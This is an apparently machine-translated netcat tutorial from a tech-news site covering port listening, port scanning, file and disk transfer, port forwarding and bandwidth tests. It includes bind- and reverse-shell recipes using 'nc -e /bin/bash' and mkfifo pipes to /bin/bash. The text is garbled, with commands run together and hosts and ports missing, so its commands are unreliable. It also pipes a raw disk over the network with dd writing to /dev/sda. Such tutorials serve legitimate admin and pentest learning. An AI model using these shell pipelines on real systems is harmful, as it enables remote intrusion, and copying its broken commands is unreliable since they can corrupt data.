Shulou(Shulou.com)06/01 Report--

This article mainly introduces the method of using ncat for you in detail. The sample code in this article is very detailed, and the detailed explanation of the picture and text is easy to learn. It is very suitable for beginners.

Function 1. Listen on local port 2. Connect to target port 3. Transfer file 4. Remote Administration with Netcat (the classification given in OSCP, do not know the role of this classification, need in-depth study) 5. Rebound shell6. Measure the network speed between two machines to monitor the local port # temporary listening port nc-l # temporary listening TCP port once nc-lu # temporary listening UDP port # take listening TCP port as an example, the listening UDP port is basically the same

Server-side temporary listening port

The client attempts to connect to the server

Establish a TCP connection

When the client disconnects, the server also turns off listening on the port

Nc-lk # permanent listening TCP port nc-lku # permanent listening UDP port # permanent listening: when listening to the port and the client side comes to connect, the server side still listens to wait for a connection; and supports multiple clients to connect at the same time. The UDP port is similar.

Connection target port # you can find the connection diagram in the listening section, and then focus on port scanning. The nc scan port creates a TCP three-way handshake connection, which causes a certain amount of traffic and is easy to be found. Nc # Connect target TCP port nc-u # connect target UDP port # use the above command to connect to the tcp or UDP port, the successful connection will block in the user input, allowing the user to interact with the target port. There is also a non-interactive mode that is suitable for scanning ports. Nc-z # scan target TCP port nc-zu # scan target UDP port #-w parameters applicable scenarios: scan UDP port; the network condition is not good. When the network is in good condition, it is not necessary to scan TCP ports with this parameter. Nc-z-W1 range

The transfer of files requires the cooperation of two machines A: data storage machine B: backup machine

TCP transfers files

B: nc-l > filenameA: nc

Filename#Anc-u

Transfer directory

# transferring a directory is the same as transferring a file, except that the directory is packaged as a compressed file through tar and unpacked by custom tar to realize the function of transferring a directory # Bnc-l | tar zxvf-# Atar zcf-* | nc

Transfer partition

B: nc-l | dd of=/dev/sdaA: dd if=/dev/sda | when nc bounce shell# nc has-e option # servernc-l-e / bin/bash-i#clientnc # nc creates forward shell#servermkfifo / tmp/fifo & & cat / tmp/fifo if there is no-e option | / bin/bash-I 2 > & 1 | nc-l > / tmp/fifo#clientnc # create reverse shell (server connects to client Then under client control) # client: nc # server: mkfifo / tmp/fifo & & cat / tmp/fifo | / bin/bash-I 2 > & 1 | nc > / tmp/fifo & & rm-rf / tmp/fifo port forwarding # servernc-l mkfifo / tmp/fifo & & cat / tmp/fifo | nc localhost | nc-l > / tmp/fifo# clientnc-n measure the network speed between machines A: nc-l > / dev/nullB: nc < / dev/zero

A, B:watch-n 1 "/ sbin/ifconfig | grep bytes"

Based on the introduction of the use of ncat, this paper focuses on its specific steps. The content of this article is compact. I hope you can get something from it. If you want to know more, you are welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.